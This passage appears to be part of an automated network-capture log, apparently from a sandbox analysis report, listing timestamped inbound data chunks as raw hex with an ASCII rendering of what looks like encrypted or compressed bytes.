50 62 2b ed 5f 6e 5d 1f a0 28 9c 45 ea 9e de dc 04 f0 bb 11 01 2a 3f f9 3d 43 74 45 c2 3e c9 fe e5 Data Ascii: {Hvn"Ia5?\|lRJ\w\<z68>z>hPhM>1BqtU{0)=YF2vrr,[j/T3%w,TY},%^qHNJZ~KVm[\gU,>Pb+_n](E*?=CtE>
2021-12-01 18:10:27 UTC	35	IN	Data Raw: 7b fd cf 5f 9f 95 38 02 0f 7a fb 53 ac 4b cf d8 45 0e 55 66 00 54 b2 7d 90 57 c7 96 0f 53 76 bc f1 49 d8 f4 8f ad 95 fe 85 9e 58 20 66 5a b3 39 1c e7 61 47 39 1a d3 00 10 0c da 15 3a 73 c2 91 9c 29 aa a6 49 5a 56 b9 47 14 09 c1 4f 64 f6 99 ab 20 d2 5c 19 be ff ce 8f f4 b9 0b 88 3c 39 98 df 83 11 e8 7c 12 c2 6d 1b 3b a6 1c 5c f1 98 36 d3 ef 78 62 4a 3d bb 06 e1 ba 58 44 2d 39 b8 50 ee 63 ce 54 ca 60 d7 17 ab 6d 70 f0 6d 0e 54 a5 3b 9d 17 fe d7 19 63 06 f1 01 c5 97 60 c2 10 5d 71 3b bd 82 40 b6 40 a3 be 95 04 60 97 ab aa 90 e5 a8 d0 15 88 17 d2 98 65 05 bf c8 e2 23 17 df 15 5b d5 f0 f5 13 8f 78 c6 de 77 da 45 0a 34 45 d0 cc e8 a5 5b ff 79 c2 3a 52 5d 8f 9c aa 38 16 39 d3 24 d7 8f 25 b7 8a b6 e3 cc 4c 42 b3 9a 4a 23 6d ce cf d1 83 b8 0f bd 6c f3 28 89 3a 6d Data Ascii: {_8zSKEUfT}WSvIX fZ9aG9:s)IZVGOd \<9\|m;\6xbJ=XD-9PcT`mpmT;c`]q;@@`e#[xwE4E[y:R]89$%LBJ#ml(:m
2021-12-01 18:10:27 UTC	36	IN	Data Raw: 69 fa 82 df 8d a8 e6 d2 d9 f6 96 1e ce 9e b6 e2 7b ed 53 b9 4d dd e9 7b 99 de 33 ab f9 82 75 83 ce 0b 8b 80 86 2e b8 76 b2 a3 7f ef 5e 9e a3 f4 da 90 48 ca 87 58 33 a1 41 40 bd b4 b3 be e0 da 72 17 0b 20 b1 a6 54 9c 47 9b 74 0a 8d 60 d9 e8 5b c1 6d e4 78 9c fc 43 72 00 8a e9 88 21 fe 2b 8a b0 18 99 86 51 08 86 ba e2 56 bc d5 54 8b c4 e9 ec ce b9 93 16 47 28 64 99 48 7f f6 76 8d 86 fa d7 23 b7 f5 21 b0 f5 85 52 59 c7 ab 33 1e e2 52 04 d9 ba 62 bb a3 cc 59 39 62 93 5e e9 b5 42 e5 5f 0e ce 36 cb ec 7a 4a 59 87 7f 83 0a da f0 9b 2a b6 25 18 f5 31 4c b6 24 3d e2 31 05 3d 47 6d 0e 15 50 a3 23 e9 39 b2 7a 25 02 7c 8e f3 53 2c 51 9f 85 6a 6b 29 f5 ba df 8a 41 89 2b a2 3b ad 0a 5f d4 0e e5 13 e1 3c b1 a2 8c 6c 7c 3e 0a 4a 7f a5 c3 d8 28 d2 e9 d0 51 ab d6 1a 5e a7 Data Ascii: i{SM{3u.v^HX3A@r TGt`[mxCr!+QVTG(dHv#!RY3RbY9b^B_6zJY*%1L$=1=GmP#9z%\|S,Qjk)A+;_<l\|>J(Q^
2021-12-01 18:10:27 UTC	38	IN	Data Raw: 17 bc fe 2e 66 25 7a 8e 41 ee c3 8e 74 98 07 40 4d 21 55 77 39 1c eb 9a 77 4f 2e a7 97 8a 34 6e 76 79 97 35 e7 14 12 ee 3e 09 68 52 27 32 1c a1 7a 44 82 a8 89 18 7f 56 31 00 6b 18 be f0 5e ac ba 13 d2 c9 8d ab cb 1f 09 2d f5 5d 73 58 93 d2 54 8c 98 24 0c 36 51 ed 42 a2 e8 7a 9c 20 06 7d df 0b 8a ae 7f 91 29 a7 19 b8 4f 4e e9 85 4c cb f7 45 60 97 dc 80 89 58 5e 39 c0 a0 35 d1 e9 61 00 0f 1b d3 00 29 09 cb 11 0e 42 c2 93 96 3b a3 ad 14 52 51 91 f6 14 09 c5 5e 62 e1 15 d0 28 c9 54 08 b7 71 62 8d 3f ab 8b a0 bd 38 d5 d5 ae 94 22 79 73 a4 92 0d 25 aa 6f 25 9f cf 3c de ec ac 40 4e 52 a8 17 e1 b0 35 dc d3 3b cf 44 cf 6c ce 5e d9 66 bf 01 af 6d 4c e3 68 1f 02 b4 3d e3 18 40 d6 13 74 08 ee 70 92 f5 60 c8 05 70 47 56 97 85 68 92 41 8b de fb c3 6b 84 a9 bc ee 84 82 Data Ascii: .f%zAt@M!Uw9wO.4nvy5>hR'2zDV1k^-]sXT$6QBz })ONLE`X^95a)B;RQ^b(Tqb?8"ys%o%<@NR5;Dl^fmLh=@tp`pGVhAk
2021-12-01 18:10:27 UTC	39	IN	Data Raw: 1f 7a 6c d1 b5 ea 19 3e da 21 90 39 20 73 6a 92 88 73 69 05 aa 8b 3f 87 17 78 02 bf 85 b5 77 98 6c ed 77 3b 93 aa dc a2 57 91 37 4c 82 71 f8 f4 ef fb ba b5 4c e2 ce 11 8b 54 eb 08 71 a6 67 5d ac 58 87 ac 46 48 74 a2 3d 80 9d 04 5c 60 c2 1c ce 88 b7 f2 26 cb dd 83 09 c1 ac 56 e0 57 f3 73 bd 4d dc e3 14 7d ce 32 a1 ec a6 08 87 ce 10 b4 96 87 d0 6b 66 a3 8c 50 fe 59 8f 71 b9 ea 9b 45 ea 92 5c 2b 5f 68 7c b5 c7 05 96 8e d1 78 04 21 da 4f 48 ae 97 aa 9d 58 18 92 6d 22 e9 66 f3 7a 1f 7e 3c e5 7b e3 02 e5 9a 96 28 e7 06 fe a0 1d 8f 5d 7d 21 ab a9 ce f7 b7 ac 4e 98 c0 f6 8e db b9 82 11 4b 22 88 9d 1f 22 e0 fb 9c 02 95 74 09 a8 e3 2d bc e6 93 57 57 ca 43 cc 33 da 59 3b aa be 62 ac cb 4e 56 c7 69 86 d6 c2 b0 7a a1 aa e2 34 48 a8 e8 60 be 70 de 6a 85 02 f1 ea 9d 02 Data Ascii: zl>!9 sjsi?xwlw;W7LqLTqg]XFHt=\`&VWsM}2kfPYqE\+_h\|x!OHXm"fz~<{(]}!NK""t-WWC3Y;bNViz4H`pj
2021-12-01 18:10:27 UTC	40	IN	Data Raw: 42 21 cc f8 e2 d7 cc 2a c1 f8 ae 6d 55 b9 23 24 5a 37 08 85 c1 57 01 84 98 cb 85 a7 ba eb 08 23 14 9a 68 07 e3 37 c5 11 81 af cd da f5 11 ef 4a 2e dc a5 57 03 a5 f1 25 87 00 31 96 48 e8 ca e7 0d bd d1 a3 80 21 e1 0d 71 77 c1 7a 23 12 b2 c0 6f eb 92 63 ff fb c6 d4 8b 5c 38 76 d7 4a 09 ed 64 3f 09 94 2d 5d 4f 24 a0 ac 2c 3e e0 c7 16 f2 bb 50 ca 2d 90 2b df e3 51 99 32 1d a6 1d 76 0d 1f 9c 0e ca 39 35 16 7e 67 e9 e6 5f a6 a3 1c ef a3 89 a4 6d 28 19 28 71 e6 af 78 eb ce 55 86 ba be 05 1e 74 fc 44 ab c2 6c be 78 0a 3a f4 0a 8a ae 03 87 39 a3 9d 1c 5d 6e d7 bc d4 d8 fe 59 79 41 e6 8c b0 66 4f 31 50 a0 34 d4 e5 4e 10 2b 1b d9 d4 3a 0a f0 14 26 72 d2 93 9c 17 aa ea 11 df 83 b9 56 0e 09 c3 4e 71 c6 c7 c3 1d d8 5c 19 9e ff d5 ae f2 95 85 8a 53 f0 d5 df 89 16 cf 75 Data Ascii: B!*mU#$Z7W#h7J.W%1H!qwz#oc\8vJd?-]O$,>P-+Q2v95~g_m((qxUtDlx:9]nYyAfO1P4N+:&rVNq\Su
2021-12-01 18:10:27 UTC	42	IN	Data Raw: b9 b9 db fc cf 29 08 03 90 79 f7 c1 a2 3c e8 a1 2e 98 63 1e 8e 4c c9 7a bc 63 28 d3 fc cb ad 44 ba 00 81 7e 9a 19 f6 3b ec 96 5b a7 b6 77 99 8e 21 c5 a4 7d ce e9 58 00 8b fd e7 78 6c 73 a4 8c d4 e5 48 22 fd 78 e1 bd 54 68 37 db a4 7e 4d 6c d3 97 f3 0f b3 c5 32 97 13 27 8b 18 92 88 7b 9f 16 ac e4 e6 94 10 64 3b b0 d1 c7 76 99 7a fe 7e 2f 81 a4 ce c9 17 f2 21 4c 84 fd c7 f4 ef fc a9 c9 dd e4 f3 51 8b 54 e0 0d 6f a2 61 0c 70 c8 83 fb 46 59 6c b8 5d 13 a4 42 57 73 c8 0d d5 9f 81 d1 b7 c9 f1 90 27 5e 85 48 e9 46 dc 73 e9 4e dc ef 14 29 cf 32 a1 e2 a0 09 ab e6 70 b2 8d 7f f9 d0 6c a1 ae 6e d7 71 f7 5e f5 f0 e7 d8 eb 83 53 22 ab 7b 79 94 c7 ba 96 88 f3 e5 1c 32 d5 5e 70 83 f4 57 9c 72 74 12 7f 27 e3 66 fc 76 c8 57 65 ef 43 74 2a 72 9b 89 2b e5 2a d6 c7 1b 93 a5 Data Ascii: )y<.cLzc(D~;[w!}XxlsH"xTh7~Ml2'{d;vz~/!LQToapFYl]BWs'^HFsN)2plnq^S"{y2^pWrt'fvWeCtr+
2021-12-01 18:10:27 UTC	43	IN	Data Raw: 7c 48 f3 d7 af 46 1e fd 33 6a f0 82 74 b6 10 f8 e2 5c c4 3f 15 6d 5d 94 bf 27 5f a9 be 8a 40 a2 a8 d9 cb c2 f4 2c 84 37 c7 17 b8 d4 57 74 3a fb d1 d9 32 9f a5 28 96 6e e9 f1 a3 d3 04 fa af 18 08 3b 36 85 5f 44 74 59 d2 37 d8 97 8a 4a 29 cc 77 f9 e7 d0 3f 5d e9 a6 67 49 3a 3d d2 47 0d 9d ac 34 48 17 18 96 d3 88 bb 26 eb 0a 23 08 72 f5 3a e2 10 24 05 1d be da d3 ed 0d 73 4a 2c c8 ab b0 05 9f fc 38 aa 3f 81 96 42 e0 c8 7f 12 ad 0a a7 53 b3 c7 1e 7b 76 dc 72 23 17 44 d7 41 6c 1d c2 f2 21 ee dc 81 4f 38 05 51 41 16 f3 89 38 3a 9f a6 a6 05 24 a1 be 01 22 6e 70 0d df 41 e6 10 30 62 2d 09 6e 70 8a 37 03 b2 06 74 83 b9 89 01 1e d6 31 2c 70 71 e9 52 5f a6 a3 98 42 aa 9f ad f0 9a 17 22 ec 5b 75 41 f6 d5 ab 8d be 3f 0c 16 56 fc 42 a8 cf 17 16 68 0f 5f 44 1a 8a a8 66 Data Ascii: \|HF3jt\?m]'_@,7Wt:2(n;6_DtY7J)w?]gI:=G4H&#r:$sJ,8?BS{vr#DAl!O8QA8:$"npA0b-np7t1,pqR_B"[uA?VBh_Df
2021-12-01 18:10:27 UTC	44	IN	Data Raw: d7 9b 35 36 1b 81 4a 55 b8 de f5 0f 14 6b 7a 71 fc 45 ff 18 57 68 09 ce 3d 96 73 0a 3e 46 ac ad 9a 1f 51 23 ad c2 1b 46 5b 86 f9 23 38 10 19 0e 3c d0 e0 37 b6 8a bc bc b9 4d 4b a9 9a 48 22 3d fe d1 b4 0a b7 0f bd 0f f3 2a 98 2b 71 91 03 cf e8 d1 29 25 00 90 75 f7 f4 a2 3c e8 a1 36 b5 ce 36 e0 49 c2 0f 10 ee 2f d9 f6 cd d6 83 ae 28 28 6d 95 05 cd 24 d4 db 50 b4 b2 6f 8a 13 10 5f b7 78 c9 c5 e5 30 8b f7 c1 4b 78 4f 8e 01 eb e5 59 27 98 dd 75 bc 52 71 1c 0b 66 12 65 5b d1 bf ed 1c bb e7 19 90 38 21 86 47 93 88 79 a6 05 84 88 ef 87 11 1d af b9 af b3 5a 9c 48 ef 76 39 93 bd d8 e8 b4 90 21 46 ed ff f9 f4 e5 92 36 ce cc e8 f3 bd 8b 54 ec 08 44 db f4 07 ad 52 94 fd 50 59 62 db a6 84 a5 44 4a ba d1 0c cc 84 90 3e d8 ca f1 87 08 d8 8d 60 82 54 f5 5d f6 c7 dd e9 7d Data Ascii: 56JUkzqEWh=s>FQ#F[#8<7MKH"=*+q)%u<66I/((m$Po_x0KxOY'uRqfe[8!GyZHv9!F6TDRPYbDJ>`T]}
2021-12-01 18:10:27 UTC	45	IN	Data Raw: 36 0d 36 f3 1b 5d 90 61 eb 85 31 05 2c 1e 7c 02 2c de aa 21 f0 5b 3a 00 71 04 6f 8c ca 7b 3d 5d bd 73 1f 6a 2f 90 26 44 a2 30 9b 21 b9 3e ae 04 5f 36 0c e5 1f a6 a6 b1 a2 80 52 ec ab 0a 4c 6a 85 c2 d1 3c 26 95 94 59 d5 41 18 25 f8 42 48 e5 d7 af 46 d6 03 34 20 db 8d 65 b1 3c 98 fe 1b c5 3f 1f 7c 54 1b b1 0f 3c c7 bc 8c 2f 23 ac d9 cd a2 6c 2c 84 27 d6 10 91 63 57 74 3c f9 d9 c8 34 9e 2f 29 96 5e c1 b2 b2 d6 2c 75 ae 02 02 16 0d 87 67 6f 42 3c f3 35 d8 f1 99 47 29 d7 75 f5 b0 fe 3e 5d ef b7 7b 52 2f 5d 08 44 21 92 85 c4 5b 1f 77 af c1 9b b7 37 f7 28 03 1e 8c f2 79 c1 2a cf 01 1b af c8 aa e8 06 73 51 0e f9 a5 4e 02 a0 e6 f7 a0 32 18 a1 42 ea 4e 43 1c 85 33 b4 56 a6 14 0d 60 7a da ae 2f 11 ab da 7c 76 1b 80 0e de 11 d2 9b 4b e4 16 51 5a 18 fa 65 b7 a1 bb c6 Data Ascii: 66]a1,\|,![:qo{=]sj/&D0!>_6RLj<&YA%BHF4 e<?\|T</#l,'cWt<4/)^,ugoB<5G)u>]{R/]D![w7(y*sQN2BNC3V`z/\|vKQZe
2021-12-01 18:10:27 UTC	47	IN	Data Raw: 49 a1 6c 1d 37 bb 68 51 22 98 3c d4 89 54 68 4e 54 af 2f 76 b0 37 d6 3c 3f dd ed cc 62 c4 76 bf 67 a4 3b c5 7f 7b e3 62 70 77 b6 3d f4 36 d7 70 10 72 05 86 44 ee 96 66 ce 0a 86 7c 71 bf b4 40 bc 49 98 d1 e7 26 68 84 a9 b0 bd b2 83 d1 1f 5c 04 d2 a3 63 04 bb de f3 27 9f 68 89 8e d4 e5 e5 18 51 63 cc eb 1b be 18 0a 3e 4c e1 a9 e9 b4 22 99 a7 c8 39 74 5d f8 df fc 38 12 1b 18 2e d0 e6 1f e5 89 bc cf e4 55 5c b3 9c 27 e5 26 ce df 6a 8d 93 27 8a 6c f3 20 85 1c 55 b9 b8 c5 36 db 07 d5 2f 91 73 db f8 b5 3e e2 aa 17 ce 74 36 e6 67 d0 7e aa e8 40 15 fc ca b3 8e a0 0d 0a 49 9a 13 d4 27 c4 ae 51 b4 b8 a0 85 04 34 c4 b8 7c d8 c1 cd 07 8b eb e9 66 73 6d bc 00 ea e5 48 13 eb 4c 38 bc 5a 78 1b d5 75 2c 7d 6f d1 e3 e7 0f b3 91 21 90 29 58 e1 52 92 82 73 b1 7c 83 e5 ec 83 Data Ascii: Il7hQ"<ThNT/v7<?bvg;{bpw=6prDf\|q@I&h\c'hQc>L"9t]8.U\'&j'l U6/s>t6g~@I'Q4\|fsmHL8Zxu,}o!)XRs\|
2021-12-01 18:10:27 UTC	48	IN	Data Raw: 76 d0 86 a9 e6 7d a7 aa 6c 20 c7 eb 9b b1 3e 92 14 52 00 74 9a 19 3f e7 70 e6 8a 94 75 25 a0 29 2d af f5 8a 6a c4 c0 bd cd 0e c8 40 1b dd d2 eb ab a4 d5 45 ce 72 b9 4d ca aa 15 37 a0 f1 37 5b b2 fc 7c 51 79 eb 11 0a 01 d9 f2 8d 08 31 2c 30 7c 1a 57 8c 0c 75 94 3a 2d b2 16 6d 04 29 79 b8 2b de bb b1 01 7b 2f 4a f9 f9 70 2c 57 86 e6 0d 66 38 f6 c3 6d a0 36 8e 3a a4 26 b4 67 53 ae 0f e3 08 c5 3d ba cd a0 78 54 ad 1b 46 51 21 d0 d9 2e b7 be 87 51 ad d4 09 29 9d 42 61 cb dd 71 43 e5 d5 02 40 f7 a2 67 bb 38 81 d6 5c ce e1 15 7c 55 1d 6b 34 57 d5 b4 9b 56 97 c6 26 34 32 dc 81 87 2d c1 64 3d d5 57 7e 32 c2 8f da 32 b0 88 b3 96 54 e6 d9 3f dc 04 f0 87 97 08 3b 3d f9 da 42 74 45 be b0 d9 f7 80 5d 57 52 65 f3 d5 b9 b5 5c e9 ac 65 46 0d 9c 2f 46 27 e7 10 c8 4a 1d 10 Data Ascii: v}l >Rt?pu%)-j@ErM77[\|Qy1,0\|Wu:-m)y+{/Jp,Wf8m6:&gS=xTFQ!.Q)BaqC@g8\\|Uk4WV&42-d=W~22T?;=BtE]WRe\eF/F'J
2021-12-01 18:10:27 UTC	49	IN	Data Raw: 8d 10 66 96 0f 53 6c c0 85 5b b7 db 51 73 99 98 60 98 51 45 26 6b f5 40 e2 ed 66 2e 38 0f c2 1e 2b 1f b5 33 24 73 c4 fc b4 15 aa ba 00 4e 49 aa 28 37 0b c3 49 05 d2 c1 c3 26 c9 48 08 ad 90 f0 bd f0 bf e3 ae 3e 39 d3 ce 97 28 40 74 61 a5 03 31 33 aa 69 2f f4 89 28 b1 f0 71 6a 44 40 b1 2f 27 b1 37 d6 00 a0 6c 31 de 7a 30 48 c7 66 a4 2a c5 3a 7a e3 62 c3 40 b0 17 f2 30 fe ff 13 72 01 e9 92 ec 3b c9 c9 0f 58 69 54 97 81 40 65 42 28 a4 96 0a 6a 84 af bb 97 8a 1a d3 6d 93 07 db 89 62 14 bb c5 c3 2d 99 20 7b 77 d4 9a ff 18 40 7d c7 56 33 be 44 0b 2d 4a ae af ff b3 cd 32 a1 df 25 e2 4a 80 eb eb a4 07 35 16 3a 4c f1 31 ac 9c 20 d8 ca 56 48 2f 8b 4e 3f 30 52 c4 b2 9e a0 93 ac 6a ed 3c 15 25 6b a6 b1 d9 74 ca 07 b4 09 86 ef ce d6 bd 37 f4 30 2e 9b 68 3a f6 d3 d8 7a Data Ascii: fSl[Qs`QE&k@f.8+3$sNI(7I&H>9(@ta13i/(qjD@/'7l1z0Hf*:zb@0r;XiT@eB(jmb- {w@}V3D-J2%J5:L1 VH/N?0Rj<%kt70.h:z
2021-12-01 18:10:27 UTC	50	IN	Data Raw: 94 c9 4a 49 18 89 d2 e8 0b 26 fa 0a 36 1b f2 df 17 eb 2c e7 10 1f be c3 ed af 04 73 5d 0e cf a5 4e 02 dc 28 29 af 1d ee 98 67 c2 73 50 12 a7 07 9c 6e ac ca 07 af 76 cb 06 17 1c ba d2 45 72 27 7c f6 09 bf c0 8a 5a 1a 1c 42 4b 0f 84 b1 39 16 8e 7e 78 6a 0c 96 bf 29 3c 63 58 3f f7 35 ed ce 3a 4c 16 08 72 7a 99 32 1c ad 15 62 a1 a8 8d 04 10 28 31 00 61 47 c1 ed 12 a6 a7 0e f9 aa 9e b7 d3 96 08 c9 fd 51 75 3c fc cf 44 ff 28 29 05 14 74 93 d1 a8 c5 72 bb 17 9c 55 6c 01 99 ad 12 bb 39 a3 93 27 4e 7d d3 92 45 d1 d6 93 70 9f f1 81 03 51 4f 3b 72 2f 33 c0 e5 75 2c 3a 1f fb 3b 3a 0c d0 39 21 75 c9 4e 3e 15 aa bc 00 5e 70 2c 47 14 03 d0 47 7b fe eb 02 23 d8 5a 31 74 fe d5 b5 d8 72 8d 88 36 56 19 de 83 0a ef 71 68 8b f0 1b 31 a0 47 28 f2 98 3a cd e1 61 6d 63 55 af 0c Data Ascii: JI&6,s]N()gsPnvEr'\|ZBK9~xj)<cX?5:Lrz2b(1aGQu<D()trUl9'N}EpQO;r/3u,:;:9!uN>^p,GG{#Z1tr6Vqh1G(:amcU
2021-12-01 18:10:27 UTC	51	IN	Data Raw: 36 e6 20 e1 7e aa e8 3e d9 ed cd d6 74 ac 28 24 6f 90 02 da 45 ca 94 51 b2 a3 74 ad d2 1d c5 a2 13 f2 c3 cd 07 8d e6 c1 09 6b 76 bc 0a fa eb 27 e4 eb 50 7e 86 f9 9c e4 2a aa 21 5c 62 a4 84 e7 0f b2 e3 2d 81 36 5e 60 52 92 89 16 e0 02 ac ee 30 59 02 57 00 8f af b5 7d 8a 7d 9e cd 39 93 a6 d7 e8 07 91 21 46 5c 73 fe de e8 d7 ba cf cc a3 ef 0b 8b 56 ea 1b 41 fc 67 07 ad 3b 86 fb 46 f4 64 b4 2e 93 a5 42 5d 60 c2 1c df 8d a8 f9 d8 cc f1 96 0f 07 85 48 e3 83 f4 5b 99 58 dc e9 7b ab ce 32 aa e0 9a 1e 82 cf 00 b1 8d 17 d1 47 7c b7 b7 7a c6 ab 85 5d f5 f6 99 45 f3 7d 58 1f a4 7f 5a a6 a7 bc 96 9f de 6d 14 cc de 63 51 ad 97 82 96 6b 11 99 7b 27 f8 72 e1 9a e0 53 13 f4 50 77 02 f4 9f 96 2b 0a 02 d2 b9 11 89 75 71 12 ab b8 e3 7d a7 a9 58 75 c5 c7 91 d8 bb fc dd 54 2d Data Ascii: 6 ~>t($oEQtkv'P~*!\b-6^`R0YW}}9!F\sVAg;Fd.B]`H[X{2G\|z]E}XZmcQk{'rSPw+uq}XuT-
2021-12-01 18:10:27 UTC	52	IN	Data Raw: 3f 15 6d 5d 0a bd 27 5f c4 bc 8a 46 a9 ad d9 d3 cc f4 2c 9a 2c c7 17 ac d4 57 74 20 ea d1 d8 29 86 a3 28 d6 55 ec f1 d2 dc 04 eb dc b8 08 3b 3d 9c 11 7f 74 4f db 1f 00 f4 8a 4c 2f b5 59 f3 df dc 11 5a ef ad ab 5c 24 32 2c 98 35 b1 bc fe 4a 17 12 9a c7 9d ba 0e c2 00 3c 17 51 fd 17 eb 28 b1 3b 1d be cf ed 26 04 73 5d 31 b8 9a 4e 04 b9 e2 21 c0 a6 31 96 48 e7 4d 43 1c bb 18 b9 6e 6e ca 0d 71 67 c3 69 31 87 a9 d3 13 59 25 7c fa 09 37 c0 8a 5a 23 00 68 6f 09 eb 7d 2e 79 b9 a0 76 45 37 a7 97 38 37 6e 7a 16 f1 1d 3d 13 3a 4c 53 bb 6f 7a 93 46 0e ab 15 65 ec ba 82 1e 1a 3b 3b 11 67 5f 1a f2 5e a0 c6 a6 f8 aa 95 d8 f1 9f 08 36 ec 56 64 56 d4 13 56 8c 94 46 b7 1f 7e e7 36 ba c5 78 ac 7a 07 47 64 1a 82 26 db 82 e2 8b 91 0f 59 54 c2 93 59 d0 d6 b3 73 9f f1 ba 91 22 Data Ascii: ?m]'_F,,Wt )(U;=tOL/YZ\$2,5J<Q(;&s]1N!1HMCnnqgi1Y%\|7Z#ho}.yvE787nz=:LSozFe;;g_^6VdVVF~6xzGd&YTYs"
2021-12-01 18:10:27 UTC	54	IN	Data Raw: 1a 51 64 c6 de 30 54 47 0a 38 23 22 a9 e9 af 7d 12 b6 ce 22 7b 73 6c f0 fd 3e 03 25 27 68 d1 e0 3d a1 10 94 22 cf 4d 58 a6 8c 60 67 27 ce df a2 19 9e 0c bc 6c f5 02 15 34 6d b3 d7 e9 ea db 07 80 30 81 76 f7 3c a1 3c e4 c3 a2 9d 77 3c cc 6a d8 7a bb eb 07 3f ff ca bf 45 b8 00 66 7f 9a 19 c9 b0 c4 7d 52 b4 b4 6b 93 2a 5a c4 a4 76 ce 5b a2 27 89 f7 cd 77 7b 5f 51 03 eb e3 27 09 e9 50 72 ba 45 64 74 c3 75 37 47 7d db d0 20 0f b3 c5 1b 5b c6 d4 a4 8c 84 99 73 c2 39 ac e4 ed ab 1b 63 22 cd 94 b5 77 98 1f ba 77 39 99 70 cd c8 28 47 32 44 93 79 e9 fd 61 4a 85 b5 32 1d 24 d5 9e 71 c2 2c 41 a5 6d 14 aa 2b 3d fb 46 42 6e 9c 16 85 a5 48 83 62 c4 36 d8 a7 a8 f9 99 fe f1 96 0d c9 84 48 b5 57 f5 5b d3 4c dc e9 db b0 ce 32 bd f3 aa 1b 82 ce 01 b1 8d 79 d1 47 6b a1 a4 7f Data Ascii: Qd0TG8#"}"{sl>%'h="MX`g'l4m0v<<w<jz?Ef}Rk*Zv['w{_Q'PrEdtu7G} [s9c"ww9p(G2DyaJ2$q,Am+=FBnHb6HW[L2yGk
2021-12-01 18:10:27 UTC	55	IN	Data Raw: 37 b6 90 b1 01 71 1d 61 99 c9 72 3d 43 8e 14 1d 46 23 81 3f 45 a2 3c 9b 2d b4 24 ad 08 66 be 10 e9 e7 c8 00 ad b3 81 6d d9 f4 0a 4a 78 9e dc c8 27 ce 8b be cc ba dd 77 6c f3 54 6a d8 de b0 41 d3 ef 35 51 e5 bf 8a b7 3c ba ce 4f d6 3f 04 7f 42 11 43 26 73 cd 84 c5 41 a9 ad c6 d7 de e6 2c 95 3f d8 08 47 d5 7b 78 2b fa c0 c8 bc 01 92 7b 89 74 ff e3 a3 cd 16 e5 b5 fc 09 17 3c be 6e 47 74 49 c2 32 c7 ec 99 58 38 cb 76 ec d6 28 3d 71 ee b0 65 4e 3a 38 3f 54 21 85 86 d6 44 e9 19 a5 c4 8d a2 36 e5 0f 2f 0f 8c e5 04 f4 3b 31 06 31 b7 d4 cf e9 9d 7f 44 32 c4 b5 4e 15 a1 f1 39 51 16 1c 9d 53 fb 55 40 88 be 00 ab 47 bf d8 0d 60 64 d1 86 3d 31 b0 a8 fe 65 25 76 e3 24 f3 d0 98 5c 23 17 5f 69 f7 ea 5b 34 07 8c b1 70 20 00 a3 bf 2f 29 4d 63 15 f7 24 f5 0f 30 b4 3d 25 67 Data Ascii: 7qar=CF#?E<-$fmJx'wlTjA5Q<O?BC&sA,?G{x+{t<nGtI2X8v(=qeN:8?T!D6/;11D2N9QSU@G`d=1e%v$\#_i[4p /)Mc$0=%g
2021-12-01 18:10:27 UTC	56	IN	Data Raw: e5 b0 31 b3 d1 39 b2 35 dd 69 df 4e 43 4e ad 35 aa 6b 15 00 69 1f 5b a2 c3 f0 6f d3 cf 02 79 12 f9 f4 fa 87 6b d9 11 c2 06 9d 97 83 4a a4 99 e4 37 94 04 60 88 be b0 84 9a 19 f9 1f 86 04 d3 e6 9e 14 bb d4 e2 2c 88 78 6d a1 4e d8 f4 1c 51 64 b8 27 18 be 4e 55 12 39 ae a2 f8 b5 cb 35 b6 c3 22 6e c1 e9 3a fd 38 1c 24 d5 43 3f e0 37 bc 99 b9 d8 c7 5c 4e a4 4c d2 35 37 c5 c4 a4 94 60 95 d2 a5 f3 2a 83 2c b7 d6 57 cf e8 d1 12 ad 70 b2 71 df d6 b1 2d f3 a9 50 54 77 36 ea 55 f8 52 bb ff 27 bc d4 c8 b9 56 bf 39 33 78 f5 37 dc 2a ea 87 40 a5 b7 11 a3 00 1e c3 b5 6d f0 cd c9 01 8d 98 e1 64 7d 71 ba 11 fa 8a 5e 22 eb 5a 65 ac 43 b4 08 c5 65 27 5c 7b ef a2 18 f0 4c de 28 87 ee 38 52 43 9b 99 6a 89 a1 51 1b 13 59 02 57 00 8f af b5 7d 8a 62 9e cd 39 93 a6 d1 e8 07 91 21 Data Ascii: 195iNCN5ki[oykJ7`,xmNQd'NU95"n:8$C?7\NL57`,Wpq-PTw6UR'V93x7@md}q^"ZeCe'\{L(8RCjQYW}b9!
2021-12-01 18:10:27 UTC	58	IN	Data Raw: 70 b4 fb 29 f6 7c a1 19 91 75 25 9f d7 3e b9 ec 94 7a af c1 bd c7 37 e9 51 13 c0 ae 67 bb a1 fb 67 c7 63 b5 71 c9 c3 c0 be a1 fb 3a 95 64 ed 7a 40 60 f7 56 df 00 d9 f2 93 0b 08 c6 1b f3 1d 7f 62 22 3d 83 19 58 3d 17 6b 1d 00 4f 81 c7 f5 34 b6 29 96 01 7c 8c f3 2f 2c 51 93 f9 1a 63 01 17 af 45 a4 1e 61 28 a8 31 97 55 77 ac 09 f6 11 c0 04 ac a6 86 7c 7c b6 0e 4a 7f a5 8e d9 28 de 87 82 58 83 cc 1c 25 f4 7c 7f cf d7 a9 64 9d fd 35 46 fb b9 7c 9e 3e bb d6 5a d2 17 3b 6d 5d 00 ab 09 0c b7 9e 88 40 af be d0 da c4 e5 28 ac c8 c4 17 bf c5 51 5c 1d ea d1 d3 5d 9e a2 28 90 45 e5 e0 ab b3 20 f8 af 04 19 32 26 91 00 65 76 4f d7 26 d1 df aa 4e 38 dc 0b d9 dd d6 3a 5b f8 af 19 55 24 32 26 98 2e b1 bc fe 4a 17 12 9a c9 b3 89 26 fa 0a e2 1d 52 e1 33 c3 1f cf 07 17 ad ce Data Ascii: p)\|u%>z7Qggcq:dz@`Vb"=X=kO4)\|/,QcEa(1Uw\|\|J(X%\|d5F\|>Z;m]@(Q\](E 2&evO&N8:[U$2&.J&R3
2021-12-01 18:10:27 UTC	59	IN	Data Raw: 70 31 5a b2 91 d1 e7 71 34 3a 1d 05 11 2b 0a 0c ce aa 4c c2 93 9d b5 bb b4 05 4e 4c 91 e4 14 09 c9 67 7b f6 c3 c9 33 df 4d 1d 96 63 d5 bf fa a6 9c a0 d5 38 d5 d5 92 06 26 60 bb bc 43 0a 36 82 f3 3e f0 92 23 ce ce 99 6b 4e 58 7f 18 d8 ed ed cf 28 31 a3 3a e4 88 cf 5e d3 ea fb 31 aa 6c 52 d0 69 1f 5b b8 2c f4 27 29 c4 15 63 05 f8 67 d2 a8 9f 37 fe 50 41 c8 97 83 4a b6 9d 99 f0 a3 04 6a 8e 87 95 97 8a 85 db 3d ba 04 d5 83 bc 14 bd f4 f3 27 d8 74 7a 77 d4 f0 ff 18 51 62 d7 db 62 bf 44 0a 44 4d bf a9 fb a5 51 23 bd c8 33 7f 40 b6 f4 fd 3e 17 33 0f 52 d0 e0 26 b4 80 be df a3 ac 5f b3 90 57 7c 15 c6 d7 a3 ec be 0e bd 